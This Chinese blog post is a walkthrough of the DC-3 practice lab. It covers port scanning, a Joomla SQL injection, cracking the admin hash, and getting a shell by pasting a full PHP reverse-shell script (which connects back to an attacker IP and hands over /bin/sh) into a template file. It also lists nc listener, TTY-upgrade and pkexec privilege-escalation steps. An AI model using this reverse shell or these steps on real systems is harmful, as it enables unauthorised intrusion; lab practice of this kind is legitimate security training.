渗透测试演练 DC-3

已于 2023-05-19 18:26:35 修改
阅读量360 收藏
点赞数 1
分类专栏: 渗透测试演练 文章标签: 网络 运维 数据库 网络安全 安全
于 2023-05-19 18:22:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73351035/article/details/130772098
版权
本文描述了一次针对10.10.10.130靶机的渗透测试过程,首先通过nmap和fscan发现主机开放了80端口,确认运行的是JoomlaCMS。接着,利用hashcat破解密码,通过SQL注入获取后台管理员密码,然后利用php-reverse-shell.php创建反向Shell,最终实现权限提升。
摘要由CSDN通过智能技术生成

author:leadlife

data:2023/5/15

blog:Tripse Blog

本次测试使用到的工具如下:

  • 信息收集:nmap、fscan、cmseek、searchsploit

  • hash识别:hashid

  • 暴力破解:hashcat

  • 内部信息收集:无

  • 权限提升:无

外部信息收集

Nmap ICMP 扫描发现主机

其中 IP:10.10.10.130 为 靶机 IP

 sudo nmap -sP 10.10.10.0/24 -T4 --min-rate 10000
 Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-15 18:08 CST
 Nmap scan report for 10.10.10.130
 Host is up (0.000092s latency).
 MAC Address: 08:00:27:81:03:54 (Oracle VirtualBox virtual NIC)
 Nmap scan report for 10.10.10.254
 Host is up (0.00026s latency).
 MAC Address: 00:50:56:FC:DC:5C (VMware)
 Nmap scan report for 10.10.10.1
 Host is up.
 Nmap done: 256 IP addresses (3 hosts up) scanned in 0.35 seconds

Fsacn 探测开放端口

发现仅开放 80 端口

 sudo fscan -h 10.10.10.130 -t 30 -p 0-65535
    ___                              _
   / _ \     ___  ___ _ __ __ _  ___| | __
  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
 / /_\\_____\__ \ (__| | | (_| | (__|   <
 \____/     |___/\___|_|  \__,_|\___|_|\_\
                      fscan version: 1.8.1
 start infoscan
 (icmp) Target 10.10.10.130    is alive
 [*] Icmp alive hosts len is: 1
 10.10.10.130:80 open
 [*] alive ports len is: 1
 start vulscan
 [*] WebTitle: http://10.10.10.130       code:200 len:7082   title:Home
 [+] http://10.10.10.130 poc-yaml-joomla-cve-2017-8917-sqli
 已完成 1/1
 [*] 扫描结束,耗时: 3.732715478s⏎

Nmap 进行详细端口扫描

  • 为避免某些端口的疏忽,这里再用 nmap 进行一次扫描

  • 发现提示 WEB 为 Joomla

 sudo nmap -sS -sV -sC -T4 --min-rate 10000 -O -oN nmap.all 10.10.10.130 -p0-65535
 Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-15 18:11 CST
 Nmap scan report for 10.10.10.130
 Host is up (0.00026s latency).
 Not shown: 65535 closed tcp ports (reset)
 PORT   STATE SERVICE VERSION
 80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
 |_http-title: Home
 |_http-generator: Joomla! - Open Source Content Management
 |_http-server-header: Apache/2.4.18 (Ubuntu)
 MAC Address: 08:00:27:81:03:54 (Oracle VirtualBox virtual NIC)
 Device type: general purpose
 Running: Linux 3.X|4.X
 OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
 OS details: Linux 3.2 - 4.9
 Network Distance: 1 hop
 ​
 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 9.38 seconds

判断 CMS

访问 Web 页面验证是否为 Jommla

CMSeek 判断 CMS 版本

searchsploit 搜寻 cms 版本漏洞

可以判定很可能存在 SQL 注入,那么下面思路如下:

  • 通过 SQL 注入拿到数据库中后台的管理员密码

  • 后台获取 SHELL

获取 SHELL

利用漏洞

先查看漏洞的说明

这里用 PHP 起一个 HTTP 服务利用该脚本进行测试

访问本地 127.0.0.1:1234 利用如下:

识别 Hash

破解 Hash

利用到 hashcat

密码字典:seclists:/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt

  hashcat -a 0 -m 3200 hash.txt /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt

得到密码:snoopy

登入后台 Getshell

来到后台:http://10.10.10.130/administrator/index.php

这里利用到 php-reverse-shell.php,内容如下:

注意修改 IP 和端口用于 nc 监听

 <?php
 ​
 set_time_limit (0);
 $VERSION = "1.0";
 $ip = '10.10.10.1';  // CHANGE THIS
 $port = 1234;       // CHANGE THIS
 $chunk_size = 1400;
 $write_a = null;
 $error_a = null;
 $shell = 'uname -a; w; id; /bin/sh -i';
 $daemon = 0;
 $debug = 0;
 ​
 //
 // Daemonise ourself if possible to avoid zombies later
 //
 ​
 // pcntl_fork is hardly ever available, but will allow us to daemonise
 // our php process and avoid zombies.  Worth a try...
 if (function_exists('pcntl_fork')) {
     // Fork and have the parent process exit
     $pid = pcntl_fork();
     
     if ($pid == -1) {
         printit("ERROR: Can't fork");
         exit(1);
     }
     
     if ($pid) {
         exit(0);  // Parent exits
     }
 ​
     // Make the current process a session leader
     // Will only succeed if we forked
     if (posix_setsid() == -1) {
         printit("Error: Can't setsid()");
         exit(1);
     }
 ​
     $daemon = 1;
 } else {
     printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
 }
 ​
 // Change to a safe directory
 chdir("/");
 ​
 // Remove any umask we inherited
 umask(0);
 ​
 //
 // Do the reverse shell...
 //
 ​
 // Open reverse connection
 $sock = fsockopen($ip, $port, $errno, $errstr, 30);
 if (!$sock) {
     printit("$errstr ($errno)");
     exit(1);
 }
 ​
 // Spawn shell process
 $descriptorspec = array(
    0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
    1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
    2 => array("pipe", "w")   // stderr is a pipe that the child will write to
 );
 ​
 $process = proc_open($shell, $descriptorspec, $pipes);
 ​
 if (!is_resource($process)) {
     printit("ERROR: Can't spawn shell");
     exit(1);
 }
 ​
 // Set everything to non-blocking
 // Reason: Occsionally reads will block, even though stream_select tells us they won't
 stream_set_blocking($pipes[0], 0);
 stream_set_blocking($pipes[1], 0);
 stream_set_blocking($pipes[2], 0);
 stream_set_blocking($sock, 0);
 ​
 printit("Successfully opened reverse shell to $ip:$port");
 ​
 while (1) {
     // Check for end of TCP connection
     if (feof($sock)) {
         printit("ERROR: Shell connection terminated");
         break;
     }
 ​
     // Check for end of STDOUT
     if (feof($pipes[1])) {
         printit("ERROR: Shell process terminated");
         break;
     }
 ​
     // Wait until a command is end down $sock, or some
     // command output is available on STDOUT or STDERR
     $read_a = array($sock, $pipes[1], $pipes[2]);
     $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
 ​
     // If we can read from the TCP socket, send
     // data to process's STDIN
     if (in_array($sock, $read_a)) {
         if ($debug) printit("SOCK READ");
         $input = fread($sock, $chunk_size);
         if ($debug) printit("SOCK: $input");
         fwrite($pipes[0], $input);
     }
 ​
     // If we can read from the process's STDOUT
     // send data down tcp connection
     if (in_array($pipes[1], $read_a)) {
         if ($debug) printit("STDOUT READ");
         $input = fread($pipes[1], $chunk_size);
         if ($debug) printit("STDOUT: $input");
         fwrite($sock, $input);
     }
 ​
     // If we can read from the process's STDERR
     // send data down tcp connection
     if (in_array($pipes[2], $read_a)) {
         if ($debug) printit("STDERR READ");
         $input = fread($pipes[2], $chunk_size);
         if ($debug) printit("STDERR: $input");
         fwrite($sock, $input);
     }
 }
 ​
 fclose($sock);
 fclose($pipes[0]);
 fclose($pipes[1]);
 fclose($pipes[2]);
 proc_close($process);
 ​
 // Like print, but does nothing if we've daemonised ourself
 // (I can't figure out how to redirect STDOUT like a proper daemon)
 function printit ($string) {
     if (!$daemon) {
         print "$string\n";
     }
 }
 ​
 ?>

操作步骤如下:

将源 error.php 代码删除,复制粘贴 php-reverse-shell.php 内容进去

本地启用监听:

 nc -lvnp 1234

访问:http://10.10.10.130/templates/beez3/error.php

即可获得回弹 SHELL

内部信息收集

优化 SHELL

  • 操作 TTY SHELL :python -c 'import pty;pty.spawn("/bin/bash")'

  • 操作环境变量:export TERM=xterm

内核与发行版

SUID

操作 SUID 时发现了该程序,可直接用 CVE-2021-4034 本地提权

SUDO

无 sudo 位

权限提升

先本地用 Python 起一个 Web 用于传输文件

编译,提权

End Flag

LeadlifeSec0x
关注
专栏目录
Linux渗透测试训练--DC3
qq_34094920的博客
12-01 980
渗透机IP:192.168.1.108目标靶机IP:192.168.1.106任务通过渗透机进入目标主机 获取flag。
渗透测试DC系列
做一个俗人
03-17 655
渗透测试DC-1 小伙伴们打过DC靶机嘛,昨天一个刚进门的小老弟从头问到尾,今天也是有时间,详细走一遍我们打DC靶机流程,详细讲解一哈,可能比较啰嗦但是,对小白还是很有帮助的,大佬微喷~ 环境搭建就不过多介绍了,文末会放上DC靶机的下载连接,我们直接开始~ 1、如下图所示,我们需要准备,dc-1靶机环境,kali攻击机环境,需搭建一个虚拟网络,使他们在同一网段上。例如VMnet1,可自选,只要你的本机开启对应得虚拟网络dc与kali保持同一类型就可以。 2、先看一下我们所存在得网段-ifconfig
Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞
huayimy的博客
12-30 1087
Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞,com_fields组件,启动docker,安装mysql数据库
CMS Joomla SQL 注入漏洞(CVE-2017-8917
CuiXY's Blog
01-18 870
0x01 原理 1.Joomla是内容管理的网站程序,也就是CMS。漏洞原理是com_fields组件,对请求数据过滤不严谨,从而导致sql注入。这个就是有问题的代码,可以看出sql根本没有过滤,通过对list中的fullordering这个字段的精心构造,就可以完成sql攻击 2.追根溯源,网站程序Joomla的com_fields启动时,会调用display这个方法 3.display这个...
fscan工具的使用
热门推荐
年轻的痞子的博客
08-23 3万+
fscan 内网工具的介绍使用 支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis 批量写公钥、计划任务反弹 shell、读取 win 网卡信息、web 指纹识别、web 漏洞扫描、netbios 探测、域控识别等功能
Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境
最新发布
weixin_45653478的博客
05-17 601
Joomla是一个基于PHP的内容管理系统(CMS),广泛应用于各类网站。2017年,Joomla 3.7.0版本被发现存在SQL注入漏洞(CVE-2017-8917),攻击者可以利用该漏洞对数据库进行未授权查询或操作,可能导致数据泄露、篡改甚至删除。
安全人员必备内网漏扫工具——fscan是什么?并Win11安装fscan扫描工具、操作方法
weixin_44716769的博客
11-15 1万+
当Fscan扫描一个IP地址时,它会发送一个ICMP Echo Request消息,如果目标主机响应了这个消息,说明目标主机是存活的。它会向目标主机发送一个TCP连接请求,如果目标主机响应了连接请求,说明该端口是开放的。该命令将扫描xxx.com的TCP端口,并尝试根据响应的TCP包识别运行的服务类型和版本号。该命令将扫描xxx.com的TCP端口,并尝试根据响应的TCP包推断操作系统类型。该命令将扫描xxx.com的所有TCP端口,并列出开放的端口和运行的服务。生成fscan.exe可执行文件。
渗透测试 ( 2 ) --- 渗透测试系统、靶机、GoogleHacking、kali工具
墨鱼菜鸡
07-11 2361
操作系统:https://zhuanlan.zhihu.com/p/162865015 1、基于 Windows、Linux、Android 的渗透测试系统 1.1 基于 Linux 的系统 Kali:https://www.kali.org/get-kali/Parrot Security OS:Parrot Securitybackbox:ht...
『VulnHub系列』DC- 1-Walkthrough.pdf
10-30
VulnHub是一个为安全研究人员和渗透测试人员提供实战演练的平台,通过在线虚拟机靶机的方式供用户学习和练习渗透测试技术。VulnHub系列中的DC-1是一个为初学者设计的具有漏洞的实验室,目的是帮助新手渗透测试者在...
DC-1 靶机笔记
MZa1213123的博客
02-21 1182
1、搭建好靶机后,由于采用的是桥接模式,前对网段快速 ping 一下,(因为试过很多次 nmap 都要等很久,不知道什么原因)。也可用 sudo arp-scan -l 查看 arp 缓存得知目的主机的 ip 地址,前提是要在桥接模式。 2、使用 nmap 进行信息收集 可知 80 端口有 drupal 搭建的网站,而且是 drupal 7 经过在网上的一番搜索如何入手时 都是使用 msfconsole 对 drupal 进行渗透 对 drupal 在 msfconsole 中 .
闲谈:渗透测试-红队版
weixin_43896582的博客
04-27 8770
闲谈:渗透测试-红队版第二篇Blind XSS漏洞反序列化攻击JavaScript 和远程代码执行服务器端请求伪造(SSRF)XML 外部实体攻击(XXE) 第二篇 短短的一生我们总会失去。你不妨大胆一些,攀一座山,追一个梦。 Blind XSS漏洞 见字知意,正如攻击的名称所表示的那样,攻击者/用户看不到存储的 XSS payload 的执行(无回显),只有管理员或后台员工才能看到。易被遗忘,可...
网站漏洞渗透测试项目复检分析
网站安全资讯
09-26 644
最近我们Sinesafe参加的几家机构的渗透测试防守方防护方案评估复查,部分防守方缺乏对攻击者的正确认知,攻击者的手法已经比较高超了,不扫描,不落地,污染日志等都很普及了。同时也要正确认知对手:攻防演练中,攻击者并非无所不能,他们面临着和防御方一样的问题:时间紧,任务重。所以攻击者的攻击目标,...
渗透测试演练 DC-4
m0_73351035的博客
05-19 276
在 jim home 目录下发现其他文件,由此可直接将用户名作为一个字典,得到的 passwords 作为一个字典,进行爆破。思路:尝试登录看看数据包情况,是否存在 SQL 注入 [失败],并无 SQL注入漏洞。其中 exim4 可用于提权,但更令我好奇的是 test.sh。存在命令注入,burpsuite 抓包反弹 SHELL。先尝试执行其他命令,发现可任意执行其他命令,无需绕过。发现如下存在的页面:均需要认证后才可登陆。发现一个密码,为 Charles 的。内容如下,目前貌似无法利用,
fscan的安装与使用
新雪兰
06-06 3795
直接下载exe文件就行。
FastDFS环境搭建
攀登Fox的博客
08-10 231
目录一、说明二、FastDFS基础环境安装2.1、安装依赖2.2、解压 FastDFS 核心库2.3、编译安装2.4、创建软连接2.5、解压 FastDFS 主程序2.6、配置修改2.7、编译安装2.8、资源查看2.8.1、服务脚本2.8.2、配置文件模板2.8.3、内置命令三、tracker基础配置3.1、创建跟踪服务配置文件3.2、修改配置文件3.3、创建自定义目录3.4、修改启动服务脚本3.5、常用命令3.5.1、启动服务3.5.2、查看服务状态3.5.3、停止服务3.5.4、重启服务3.5.5、设置
渗透测试演练 DC-2
m0_73351035的博客
05-12 139
demonstration:密码复用同时存在于本地登陆情况和外部登陆情况。
渗透测试演练 DC-7
m0_73351035的博客
05-19 152
等待回弹即可,最后却没有回弹,这里可参考网上 writeup,应当是执行环境有问题,且执行过程中验证了某些东西。来到 DC7 Web 页面,可以看到 CMS 位 Drupal。安装完后返回 Content 编辑内容,即可添加 PHP 代码。mbox:内容看着像一个定时备份,但是失败而保存的邮件。安装 PHP Filter 模块:本地下载上传。登陆失败,转换思路:尝试密码复用去登陆 ssh。本地靶机 IP为 10.10.10.137。修改页面内容,则可操作 php 代码。2:利用后台进行 GetSHELL。
渗透测试演练系统推荐:从VulApps到WebGoat
"这篇文档介绍了多个常用于渗透测试演练的系统和平台,旨在提供学习和实践渗透测试技术的场所。这些靶场涵盖了不同难度级别的漏洞环境,从基础的SQL注入到复杂的Web应用漏洞,适用于初学者到专业人士的不同需求。" ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

LeadlifeSec0x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值